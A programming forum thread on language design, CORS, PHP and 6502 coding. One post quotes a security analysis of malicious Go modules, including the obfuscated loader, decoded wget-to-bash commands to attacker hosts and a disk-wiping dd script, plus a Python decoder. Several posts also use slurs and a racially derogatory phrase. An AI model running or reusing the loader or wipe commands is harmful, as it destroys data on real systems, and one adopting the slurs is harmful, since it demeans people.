Programming thread

A language having multiple (complete) implementations is actually a very good metric for deciding whether it's worth using.
This feels like a really bonkers claim.

Suppose C++ (or insert your favorite modern lang) had only one complete implementation (similar to how Rust only has one, the official). Assuming the sole implementation is freely licensed, in what way would this alone make C++ less worth using? Having multiple complete implementations is always a good thing, but it's really arbitrary as the sort of metric you're proposing. If I wrote my own gay-ass borrow checker and shit, it wouldn't make Rust any more or less worth using; it's still trash.
 
Why do people use JavaScript for server-side stuff? OK, I need to call an API. Oh wait, you can't do that, because that API doesn't do any CORS magic, or I'm fucking something else up entirely. So I get to set up a proxy to be able to call my API. This is all in the template code, of course, because otherwise no one would be able to use this code for anything. Already told them I'll make this minimal POC work, then they can find someone who understands this shit.
 
Why do people use JavaScript for server-side stuff? OK, I need to call an API. Oh wait, you can't do that, because that API doesn't do any CORS magic, or I'm fucking something else up entirely. So I get to set up a proxy to be able to call my API. This is all in the template code, of course, because otherwise no one would be able to use this code for anything. Already told them I'll make this minimal POC work, then they can find someone who understands this shit.
I'm no genius, but I'd assume it has something to do with everything looking like a nail. For example, let's say you're a back-end web dev who knows a lot of PHP. If PHP were able to do front-end development (idk if it can, I've never used it), chances are if you wanted more work you'd use it instead of learning something new, wouldn't you?
 
Suppose C++ (or insert your favorite modern lang) had only one complete implementation (similar to how Rust only has one, the official). Assuming the sole implementation is freely licensed, in what way would this alone make C++ less worth using?
Because then you'd be stuck with the quirks of whatever that one implementation does, which ossify into a sort of informal standard regardless of what the actual language standards (if they even exist) say. Having multiple implementations (and therefore multiple parallel userbases) adds market pressure for everyone to stick to a standard, stay interoperable, and generally not act like retards.

I mean, look at Internet Explorer 6 and HTML/CSS for an example of "one implementation" going off the rails.
Arguably, the woeful state of Microsoft's C/C++ standards conformance is also due to their pseudo-monopoly on compilers for Windows. And it does make C++ that much less worth using.
 
Late night... staring at the screen. I give up. Big bloated ancient system dating back to the early 2000s, if not earlier. A succession of hapless men adding layer upon layer on top of the growing pile. It's now a veritable monstrosity of countless variables and functions twisting around each other across countless files and subfolders. It was so bad for a while that I was looking into automated solutions to try to figure out the file tree structure. I estimate maybe 90% of the code no longer serves any function but just runs (or doesn't) anyway, doing who knows what. The perils of earlier authors trying to design a system to 'do it all'. It wasn't my fault, but I was trapped by this decision. Years ago I made an abortive attempt to separate the project out from the mountain of unused junk, but it didn't work out. Still not sure if I broke anything in the process. I hope not.

I've sure added to the mountain myself. Years of back-and-forth requirements: adding functionality and removing it and adding it again and changing it. People forgetting they asked for it to be put in, then asked for it to be removed, then asking to add it again. Things get left switched around, or remain in place even after they're dropped, in case someone decides they need them again. Subsystems pile onto other forgotten subsystems.

It's gotten so sprawling that even the debugger nopes out. I can't follow it anymore, even though I designed the last few layers myself and probably understand the system better than almost anyone else.

Gonna have to burn it down. Take it apart piece by piece and reassemble it.

I've been putting this day off for a long time. Dreading it to the point where I almost felt unwell at random instances, in a restaurant or whatever, when it would come to mind. Part of me wants to just wash my hands of it and move on. There's technically nothing compelling me to look into this again. It's so complicated and obscure I could just toss the whole thing aside and it's highly unlikely anyone would ever notice... at least until they come up with an army of super-powered AI bots to vet all the code on the internet. Part of me doesn't want to do it because I'm scared of what I might find: that one or several values somewhere in the labyrinth got tripped up here or there, and it's been spitting out incorrect information for months or years or maybe decades. The other part of me is just so burnt out on the whole thing.

Ah well...back to work I guess.
 
IDK, what do you think happens if you build up a binary pattern signature database for 20 years and never remove anything?
From what I've heard, it was due to the language being used early on by multiple pieces of malware, and thus the compilers' heuristic signatures getting thrown into AV databases. Though it's still retarded.
 
I'm no genius, but I'd assume it has something to do with everything looking like a nail. For example, let's say you're a back-end web dev who knows a lot of PHP. If PHP were able to do front-end development (idk if it can, I've never used it), chances are if you wanted more work you'd use it instead of learning something new, wouldn't you?
I agree, it's just convenience or laziness or both. The logic is "hey, I know JS, I can write backend code in JS, guess I'll go with JS on the backend too."

PHP's not that bad, especially for server-side rendering.

I have experience with PHP. It's pretty straightforward and quite nice despite all the negative publicity, which was due to some old-school security issues that have since been patched. I use it for server-side rendering on pages where JS fetch & render is too slow (or too late in the page rendering process). For instance, for SEO purposes, I'll use PHP to write some of the dynamic metadata of a templated HTML page so that dynamically generated pages can be indexed by search engines. When I do JS fetch & render, it's too slow (or late) and my pages don't get indexed.

PHP has nice integration with the Apache web server as well, making deployments clean.
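The server-side metadata trick described above is just string templating before the response goes out. Here's the same idea sketched in Python rather than PHP for illustration; the template, page slug, and product data are all made up:

```python
# Sketch of server-side metadata injection, the same idea as the PHP
# approach described above. Template and page data are hypothetical.
TEMPLATE = """<html>
<head>
<title>{title}</title>
<meta name="description" content="{description}">
</head>
<body>...</body>
</html>"""

# Per-page data that a crawler would never see if it were fetched and
# rendered client-side after page load.
PAGES = {
    "widget-9000": {
        "title": "Widget 9000 | Example Shop",
        "description": "The Widget 9000 does widget things.",
    },
}

def render_page(slug: str) -> str:
    """Fill the metadata in on the server so search engines index it."""
    meta = PAGES[slug]
    return TEMPLATE.format(**meta)
```

The crawler gets the finished `<head>` in the initial response, with no JS execution required.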
 
Having multiple implementations (and therefore multiple parallel userbases) adds market pressure for everyone to stick to a standard, stay interoperable, and generally not act like retards.
If this were actually true, we wouldn't still be in compatibility hell with compiled langs.

Arguably, the woeful state of Microsoft's C/C++ standards conformance is also due to their pseudo-monopoly on compilers for Windows. And it does make C++ that much less worth using.
Assuming the sole implementation is freely licensed, in what way would this alone make C++ less worth using?
The overall reading comprehension ability in this thread is taking a sharp decline.
 
Why do people use Javascript for server side stuff. Ok, I need to call an API. Oh, wait, you can't do that because that API doesn't do any CORS magic, or I'm fucking something else up entirely. So I get to setup a proxy to be able to call my API. This is all in the template code, of course, because otherwise no one would be able to use this code for anything. Already told them I'll make this minimal POC work then they can find someone who understands this shit.
If everything is written in one language, you'll have an easier time maintaining and expanding the codebase later, because future developers won't need to know multiple languages. This is especially a benefit with JS because it's such a common language. I'd say you get type transparency between modules, but in practice all this really means is native ingestion of JSON on both ends, which isn't all that special anymore.

Also, CORS is a browser requirement for asynchronously calling an API from another origin; it has nothing to do with the server-side language at all, and a backend in any language has to deal with it. I've dealt with it in Python and Java too, so it's not a NodeJS thing.

[...] I use it for server side rendering for pages where JS fetch & render is too slow (or too late in page rendering process). For instance, for SEO purposes [...]
This is a solved problem in the world of JS in the form of SSR, but I can certainly understand a preference not to hitch your wagon to any particular JS framework, as they're extremely heavy, committal, and fickle in the sense that future updates will invalidate your codebase in at most 5 years.
 
Also, the CORS thing is a requirement for asynchronously calling an API from the browser. It has nothing to do with the server-side language at all
That's what all the docs tell me, but this was a server-side component that was failing. Using https://api/.... was broken; adding https://api to the local proxy and then using http://localhost/proxy/api worked. Maybe some weird glitch in one of the 2000 node packages this thing pulled in.

I guess I should be fair, at least people who 'program' JavaScript will never try and screw up any useful code.

Worst
Language
Ever*

* Except for every other language.
 
wget to Wipeout: Malicious Go Modules Fetch Destructive Payload

In April 2025, we detected an attack involving three malicious Go modules which employ similar obfuscation techniques:

Despite appearing legitimate, these modules contained highly obfuscated code designed to fetch and execute remote payloads. Socket’s scanners flagged the suspicious behaviors, leading us to a deeper investigation.

Unlike centralized package managers such as npm or PyPI, the Go ecosystem's decentralized nature, where modules are imported directly from GitHub repositories, creates substantial confusion. Developers often encounter multiple similarly named modules with entirely different maintainers, as shown below. This ambiguity makes it exceptionally challenging to distinguish legitimate packages from malicious impostors, even when packages aren't strictly "typosquatted." Attackers exploit this confusion, carefully crafting their malicious module namespaces to appear trustworthy at a glance, significantly increasing the likelihood that developers inadvertently integrate destructive code into their projects.
Searching for packages on https://pkg.go.dev can yield a minefield of random forks and shit. You can usually tell which are the main ones based on the "Imported by" count, but you could easily fake that by creating a shitload of dummy repos that import your malicious package. tbh I find most of the go packages I use from their github links in google/bing/wtf search results. Not sure what the best solution to this issue is, given the decentralized design of go's packaging system.

Attackers cleverly masked their intent through array-based string obfuscation and dynamic payload execution—a method we previously explored in our "Obfuscation 101" blog. Here’s how one malicious module (truthfulpharm/prototransform) executed this trick:
Go:
func eGtROk() error {
    DmM := []string{"4", "/", " ", "e", "/", "g", "d", "3", "6", " ", "4", "w", "/", "7", "d", ".", "O", " ", "s", "b", "5", "3", "/", "c", "t", "0", "4", "c", "h", " ", "f", "a", "t", "/", "i", "/", "1", "b", "n", "p", "t", "7", "d", "-", "&", ":", "4", "e", "t", "4", "-", "d", "4", "g", "o", "d", "s", "e", "r", "7", ".", "/", "|", ".", " ", "1", "h", " "}
    pBRPhsxN := runtime.GOOS == "linux"
    bcbGOM := "/bin/sh"
    vpqIU := "-c"
    PWcf := DmM[11] + DmM[5] + DmM[47] + DmM[32] + DmM[29] + DmM[50] + DmM[16] + DmM[2] + DmM[43] + DmM[17] + DmM[66] + DmM[24] + DmM[40] + DmM[39] + DmM[45] + DmM[12] + DmM[4] + DmM[36] + DmM[49] + DmM[13] + DmM[15] + DmM[46] + DmM[20] + DmM[63] + DmM[0] + DmM[26] + DmM[60] + DmM[52] + DmM[65] + DmM[22] + DmM[56] + DmM[48] + DmM[54] + DmM[58] + DmM[31] + DmM[53] + DmM[3] + DmM[35] + DmM[51] + DmM[57] + DmM[7] + DmM[59] + DmM[21] + DmM[14] + DmM[25] + DmM[55] + DmM[30] + DmM[33] + DmM[23] + DmM[27] + DmM[42] + DmM[41] + DmM[19] + DmM[10] + DmM[8] + DmM[6] + DmM[67] + DmM[62] + DmM[9] + DmM[1] + DmM[37] + DmM[34] + DmM[38] + DmM[61] + DmM[18] + DmM[28] + DmM[64] + DmM[44]
    if pBRPhsxN {
        exec.Command(bcbGOM, vpqIU, PWcf).Start()
    }

    return nil
}

var GEeEQNj = eGtROk()

Note: The payload specifically targets Linux systems, checking the OS before execution, ensuring that the attack impacts primarily Linux-based servers or developer environments.

Decoded Malicious Commands:
Bash:
# prototransform module payload
wget -O - <https://vanartest>[.]website/storage/de373d0df/a31546bf | /bin/bash &

# go-mcp module payload
wget -O - <https://kaspamirror>[.]icu/storage/de373d0df/a31546bf | /bin/bash &

# tlsproxy module payload
wget -O - <http://147.45.44>[.]41/storage/de373d0df/ccd7b46d | /bin/sh &

Decoded Intent:
  • Fetches a destructive shell script (done.sh) from the attacker-controlled URL:
    • https://vanartest[.]website/storage/de373d0df/a31546bf
  • Executes it immediately, leaving virtually no time for response or recovery.

Similar URLs extracted from the other malicious modules (now offline):
  • https://kaspamirror[.]icu/storage/de373d0df/a31546bf
  • http://147.45.44[.]41/storage/de373d0df/ccd7b46d

Upon executing the payload retrieved from one of these URLs, we discovered a devastating shell script:

done.sh – The destructive payload:
Bash:
#!/bin/bash
dd if=/dev/zero of=/dev/sda bs=1M conv=fsync
sync
Obviously, any programmer worth his salt would see a function like that, do a 360, and find a different library, but they're relying on the fact that hardly anyone reads the source of everything they import. The dd command would need root to overwrite the device like that, but that's not all that unlikely given the widespread use of Go-based stuff on servers. You don't get the same sort of damage if you're running through Docker or similar, though. I'm not super worried by this, but I thought it was interesting nonetheless.
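Since the array and index order are sitting right there in the Go source, you can recover the command offline by replaying the same concatenation, without ever executing the module. Here's a quick Python decode of the block quoted above (this particular array assembles the payload command with the 147.45.44.41 address listed earlier):

```python
# Replay the malware's string assembly to recover the command without
# running anything. Array and index order are copied verbatim from the
# obfuscated Go source quoted above.
parts = ["4", "/", " ", "e", "/", "g", "d", "3", "6", " ", "4", "w",
         "/", "7", "d", ".", "O", " ", "s", "b", "5", "3", "/", "c",
         "t", "0", "4", "c", "h", " ", "f", "a", "t", "/", "i", "/",
         "1", "b", "n", "p", "t", "7", "d", "-", "&", ":", "4", "e",
         "t", "4", "-", "d", "4", "g", "o", "d", "s", "e", "r", "7",
         ".", "/", "|", ".", " ", "1", "h", " "]
order = [11, 5, 47, 32, 29, 50, 16, 2, 43, 17, 66, 24, 40, 39, 45,
         12, 4, 36, 49, 13, 15, 46, 20, 63, 0, 26, 60, 52, 65, 22,
         56, 48, 54, 58, 31, 53, 3, 35, 51, 57, 7, 59, 21, 14, 25,
         55, 30, 33, 23, 27, 42, 41, 19, 10, 8, 6, 67, 62, 9, 1,
         37, 34, 38, 61, 18, 28, 64, 44]
decoded = "".join(parts[i] for i in order)
print(decoded)
```

This kind of obfuscation defeats a grep for "wget" or a URL, but it does nothing against anyone who actually reads the function, which is exactly the point the article makes.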
 
Amen to that. Since I started using C, and now most recently Java, I feel I'd appreciate a language with the readability of Python and the rigid syntax rules of C.
When C's syntax is so rigid that it allows for uncountably infinite variations of undefined behaviour.
A language having multiple (complete) implementations is actually a very good metric for deciding whether it's worth using.
GCC and LLVM are only separate because RMS is too fat and retarded to check his email. LLVM was offered as a donation to the GNU project, directly to RMS, but he simply didn't see the email. The differences between the compilers these days are pretty small; the same people work on both and port every new optimisation to both.
 
I enjoy me some 6502 action. Unrolling loops to make things run smoothly is fun. I'm far from a real programmer tho.
Recently I've taken the black man's approach of using a high-level language for a 6502 machine.
prog8 is really fun to write in, and apparently it produces better assembly than cc65 or llvm-mos, despite the fact that it doesn't really optimize the code that much.
 
Recently I've taken the black man's approach of using a high-level language for a 6502 machine.
prog8 is really fun to write in, and apparently it produces better assembly than cc65 or llvm-mos, despite the fact that it doesn't really optimize the code that much.
That's actually very interesting, and one can always inline the asm stuff that really matters anyways. I'll have to try it out, cheers.
 
Recently I've taken the black man's approach of using a high-level language for a 6502 machine.
prog8 is really fun to write in, and apparently it produces better assembly than cc65 or llvm-mos, despite the fact that it doesn't really optimize the code that much.
The 6502 is markedly better for using HLLs on than its contemporaries like the 8080/Z80. 6502 ASM has often been compared to writing microcode directly, because it's so minimal that the majority of programmers essentially build their own ad-hoc register file in the zero page.

This flexibility made it quite nice for building byte-code systems, which is why Logo and Pascal were so readily available for it. Wozniak famously built a simulated 16-bit virtual machine for the 6502 called SWEET16.
 